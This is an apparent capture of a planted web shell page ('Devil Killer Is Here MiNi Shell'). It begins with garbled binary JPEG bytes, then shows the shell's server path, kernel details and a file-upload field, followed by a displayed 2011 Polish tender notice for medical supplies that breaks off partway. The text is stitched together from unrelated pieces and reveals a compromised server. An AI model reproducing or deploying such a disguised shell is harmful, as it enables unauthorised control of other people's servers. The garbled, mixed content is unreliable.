JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110222/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110222/60661-N-2011.html

<p class="kh_header"><b>Warszawa: Na dostawę materiałów medycznych</b><br>
<b>Numer ogłoszenia: 60661 - 2011; data zamieszczenia: 22.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Gruźlicy i Chorób Płuc , ul. Płocka 26, 01-138 Warszawa, woj. mazowieckie, tel. 43 12 312.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.igichp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Na dostawę materiałów medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> materiały medyczne określone w 15 pakietach:
-materiały zużywalne do pomp Medima ( Pakiet nr 1),
-rury do respiratora  (Pakiet  nr 2),
-złącza do strzykawek, zestaw do zaciskania naczyń, opaski (Pakiet nr 3),
-papiery rejestracyjne/termiczne (Pakiet nr 4),
-plomby i narzędzia chirurgiczne (Pakiet nr 5),
-przedłużacze do pomp infuzyjnych (Pakiet nr 6),
-rękawice sterylne bezpudrowe (Pakiet nr 7),
-prowadnice  i sondy żołądkowe (Pakiet nr 8),
-zestawy do drenażu i akcesoria (Pakiet nr 9),
-rękawice i okulary ochronne  (Pakiet nr 10),
-maski chirurgiczne (Pakiet nr 11),
-jednorazowe mankiety do mierzenia ciśnienia (Pakiet nr 12),
-igły do biopsji (Pakiet nr 13),   
-sprzęt do badań hemodynamicznych (Pakiet nr 14),
-probówki i nakładki do pobierania krwi (Pakiet nr 15)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2, 33.19.00.00-8, 22.99.30.00-7, 33.14.14.11-4, 33.14.13.23-0, 33.14.16.40-8, 33.14.14.20-0, 33.10.00.00-1, 33.14.16.41-5, 33.14.16.20-2, 33.73.51.00-2, 18.42.43.00-0, 33.19.19.00-1, 33.14.00.00-3, 33.14.12.00-2, 33.14.13.20-9, 33.19.25.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonych do ofert dokumentów i oświadczeń wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonych do ofert dokumentów i oświadczeń wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonych do ofert dokumentów i oświadczeń wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonych do ofert dokumentów i oświadczeń wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonych do ofert dokumentów i oświadczeń wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Dokumenty potwierdzające, iż oferowany przedmiot zamówienia został dopuszczony do stosowania w służbie zdrowia zgodnie z polskim prawem oraz prawem Unii Europejskiej - zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym, tj. certyfikat CE lub deklarację zgodności - zgodnie z klasyfikacją oferowanych wyrobów, a także zgłoszenie do rejestru wyrobów medycznych, (jeżeli dotyczy oferowanego wyrobu).
2.W przypadku, gdy opisany w specyfikacji przedmiot zamówienia nie został sklasyfikowany jako wyrób medyczny i zgodnie z dyrektywami europejskimi i ustawą o wyrobach medycznych nie jest objęty deklaracjami zgodności i nie podlega żadnemu wpisowi do rejestru Zamawiający wymaga złożenia stosownego oświadczenia.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igichp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Gruźlicy i Chorób Płuca w Warszawie, ul. Płocka 26, pok. 106..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2011 godzina 10:00, miejsce: Instytut Gruźlicy i Chorób Płuca w Warszawie, ul. Płocka 26, pok. 106..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1-	materiały zużywalne do pomp Medima.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Standardowy zestaw do przetoczeń do pompy Medima Line S ( 270 cm, zacisk rolkowy, komora kroplowa, zaworek swobodnego przepływu, złącze do dodatkowej iniekcji, luer-lock )	szt	1 000
2.Zestaw do przetoczeń dla krwi i płynów krwiopochodnych do pomp Medima Line B	szt	1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2-	rury do respiratora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rury do wentylacji, jednorazowe z  przewodem do cisnienia do BiPAP  Vision, szt 50
2.Rury do wentylacji, jednorazowe z trójnikiem i przewodem do cisnienia do BiPAP  ST 30,  szt 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - złącza do strzykawek, zestaw do zaciskania naczyń, opaski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zestaw do strzykawki OPTISTAR z dwoma wkładami po 60ml, łącznikiem typu Y i drenem pacjenta długości 230cm, 	sz	400
2.Zestaw do zaciskania naczyń posiadający 2 tulejki z kapturkami zabezpieczającymi, 1 obturator i 2 taśmy mocujące x 3,2 mm x 61 cm, bezlateksowy. 1 op.= 10 szt.,	op.	12
3.Opaska do mocowania rurek trachestomijnych ( dla dorosłych ),	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - papiery rejestracyjne/termiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Papier termiczny do EKG do aparatu  typu HELLIGE  - Mikrosmarck  for.90 x 90 x 360 : 400 szt  kratka ze znacznikiem,,szt	20
2.Papier termiczny do  EKG do aparatu typu Fucuda w rolkach, format: 145 x 30 m w kratkę, 3 - kanałowy., szt 20
3.Papier termiczny do aparatu Mitsubischi typu K 65 HM - ce, rozmiar: 110 mm x 21 m.,szt 400
4.Papier Ekg, bezpyłowy do aparatu AsCard A4 szer.112 mm x 25 m rolka,szt	200
5.Papier Ekg do aparatu AsCard B5 szer. 60 mm x 30 m rolka, szt	100
6.Papier termoczuły, bezpyłowy, kratka w kolorze czerwonym do aparatu EKG  AsCard Gold, szer. 210mm, rolka.,szt 100
7.Papier termoczuły, bezpyłowy, kratka w kolorze czerwonym do aparatu AsCard Gold, szer. 210mm, składanka.,szt 100
8.Papier termoczuły, bezpyłowy, kratka w kolorze czerwonym do aparatu EKG  Aspel AsCard Mr. Silwer, szer. 112 mm, szt 100
9.Papier do defibrylatora Welch Alin roz. 50 mm x 25 m., szt	50
10.Żel do EKG a 0,5 kg,	szt 150
11.Żel do USG a 0,5 kg,	szt 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.99.30.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - plomby i narzędzia chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Plomba-etykieta zabezpieczająca kontener typ Prime Line z indykatorem procesu sterylizacji z warstwą klejąca do wklejania do dokumentacji szpitalnej  koloru białego , wymiary 80x35 mm , 1 opak. = 1000 szt., op.	8
2.Igły do biopsji cienkoigłowej, roz. 0,4 x 40 : 42 mm, 1 op = 100 szt, op. 10
3.Pinceta anatomiczna wzór szwedzki z krawędziami części dystalnej ( roboczej ) ostro zakończonymi ( bez zaokrągleń ) pod kątem 90° , dł. całk. 130 mm, szt. 20
4.Skalpel ( nóż ) chirurgiczny typ Bergmann wielorazowego użytku , dł. całk. 145 mm, dł. części roboczej brzuszastego ostrza 34 mm , szerokość 7 mm . Rękojeść płaska z poprzecznymi rowkami stabilizującymi uchwyt, szt. 6
5.Trzonek do wymiennych ostrzy noży chirurgicznych ( skalpeli jednorazowego użytku ) nr. 4 , dł. całk. 135 mm., szt. 6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.11-4, 33.14.13.23-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - przedłużacze do pomp infuzyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedłużacze do pomp infuzyjnych  o standartowej średnicy, długość 200 cm, przezroczysty - biały, jałowy, apirogenny, nietoksyczny, pakowane pojedynczo, szt	7 000
2.Przedłużacze do pomp infuzyjnych  o zwiększonej srednicy  cewnika  na  poziomie przyłącza do podawania zagęszczonych kontrastów typu Medica , długość 150 cm, przezroczysty - biały, jałowy, apirogenny, nietoksyczny, pakowane pojedynczo, szt	5 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7-	rękawice sterylne bezpudrowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rękawice chirurgiczne jałowe, lateksowe bezpudrowe, typu Gammex PF lub równoważne:
kształt anatomiczny,
mankiet prosty z taśmą adhezyjną,
powierzchnia zewnętrzna mikroteksturowana i silikonowana chlorowana,
wewnętrzna pokryta poliuretanem, polimerem i silikonem,
grubość na palcu 0,22 mm,
na dłoni 0,2 mm,
na mankiecie 0,2 mm,
długość  max. 290mm,
poziom protein lateksu <30ug/g badane metodą Lowryego
norma AQL 1,0
pakowane po 40 par:
-rozmiar  6,	para	2 400
-rozmiar  6,5,para	3 600
-rozmiar  7,	para	6 000
-rozmiar  7,5,para	6 000
-rozmiar  8,	para	6 000
2. Rękawiczki w systemie podwójnego zakładania - Gammex Underglove lub równowazne
bezpudrowe lateksowe rękawice chirurgiczne używane w systemie podwójnym - rękawice spodnia ( wewnętrzna )
kolor: zielony,
grubość na palcu 0,215 mm,
na dłoni: 0.2mm,
na mankiecie: 0.2mm,
długość od 295  do 300 mm,
prosty mankiet z taśmą adhezyjną,
powierzchnia zewnętrzna mikroteksturowana,
powierzchnia wewnętrzna: polimeryzowana, zawiera, ,technologie HydraSoft ułatwiającą nawilżanie skóry, 
wartość protein lateksu <30ug/g,
norma AQL 1,0,
pakowane po 40 par:
-rozmiar  6,	para	480
-rozmiar  6,5,para	480
-rozmiar  7,	para	720
-rozmiar  7,5,para	720
-rozmiar  8,	para	720.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8-	prowadnice  i sondy żołądkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Prowadnica wielorazowa do trudnych intubacji, z wygiętym końcem, bez PCW, wykonana z poliestrowej plecionki pokrytej żywicą zapewniająca odpowiednią sztywność przy wprowadzeniu jak termoplastyczność w temperaturze ciała. Rozmiar  Ch 15 / 60 cm., szt 5
2.Prowadnica wielorazowa do wymiany rurek, prosta, bez PCW, wykonana z poliestrowej plecionki pokrytej żywicą zapewniająca odpowiednią sztywność przy wprowadzeniu jak termoplastyczność w temperaturze ciała. Rozmiar  Ch 10 / 70 cm.	, szt 5
3.Sonda żołądkowa przeciwodleżynowa wykonana z mieszaniny silikonu i PCW, zakończona gładką oliwką, z zatopionym ciężarkiem w postaci 4 stalowych kuleczek, z czterema dużymi, bocznymi otworami na końcu, z niebieską linią widoczna w Rtg, ze znacznikami głębokości na 38cm, 51cm i 64cm, z zatyczką, jednorazowa, sterylna, podwójnie opakowana, o długości 105cm. Rozmiary :	
a     -   Ch 14, szt 100
b     -   Ch 16, szt 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.14.16.41-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9-	zestawy do drenażu i akcesoria.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jednorazowy, plastikowy zestaw jednobutlowy do drenażu jamy opłucnej - 
zestaw jednobutlowy z kompletem drenów w zestawie. Komora kolekcyjna na wydzielinę wykonana zprzeźroczystego tworzywa sztucznego odpornego na uderzenia, pojemność komory 3000ml, z podziałką co 25ml. Zestaw wyposażony w dren łączący w kierunku pacjenta (z łącznikiem schodkowym) i dren łączący ze źródłem próżni. Dren łączący (pacjenta) odporny na zaginanie, elastyczny, w górnej jego części spirala zabezpieczająca przed zginaniem,  sterylny.
W opakowaniu zbiorczym 5 szt, statyw do zestawu., szt 400
2.Pojemniki wielorazowe z uchwytem do mocowania poj. 1000ml - przeźroczysty, wyskalowany w ml, wyposażony w zintegrowany zaczep 30mm do mocowania na standardowych wieszakach do szyn modura, wyposażony w zintegrowanym wymienny króciec do połączenia ze źródłem ssania nie wymagający odłączania drenu ssącego od kanistra przy wymianie wkładu jednorazowego, odporny na mycie w temp. 85° C, i sterylizację w autoklawie  121° C	,  szt	14
3.Wieszak automatyczny. Z mechanizmem sprężynowym pozwalającym na szybki montaż na szynach o różnej wysokości i grubości, kompatybilny ze zintegrowanym 30 mm zaczepem kanistrów., szt	30
4.Wkład jednorazowy 1000ml l- wyposażony w port ortopedyczny o średnicy 12mm, dający jednocześnie możliwość  odsysania standardowego (w komplecie schodkowy łącznik kątowy umożliwiający podłączenie  drenów o różnych średnicach). Uszczelniany automatycznie po uruchomieniu ssania bez konieczności wciskania wkładu na kanister, wymiana wkładu bez odłączania drenu łączącego kanister ze źródłem ssania, wyposażony w uchwyt do wygodnego demontażu, posiadający skuteczny filtr przeciwbakteryjny i zastawkę zabezpieczającą źródło ssania przed zalaniem, szeroki port na pokrywie do napełniania proszkiem żelującym, w komplecie zintegrowana z pokrywą  zatyczka do zamknięcia portu po zakończeniu ssania, wkłady bez zawartości PCV, szt 3500
5.Wkład jednorazowy 1000ml  z zawartością żelu - parametry techniczne j.w w poz. 4., szt 2500
6.Proszek żelujący - saszetka samorozpuszczalna 25g, szt	300
7.Uchwyt do drenu, wielorazowy, chodkowe gniazdo do mocowania drenów o róznych sred. Do szyn typu Modura, szt	60
8. Pojemnik do plukania 1000 ml. Do wielokrotnego uzytku, z polipropylenu, dozwolone mycie i czyszczenie w temp. 120 stop. C pasujący do uchwytu typu Serres lub Medela., szt	35
9. Wieszak na łóżko, umożliwiający zamocowanie kanistra na standardowym płytowym oparciu łóżka, kompatybilny ze zintegrowanym 30 mm zaczepem kanistrów.,	szt 35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10 - rękawice i okulary ochronne.</p>
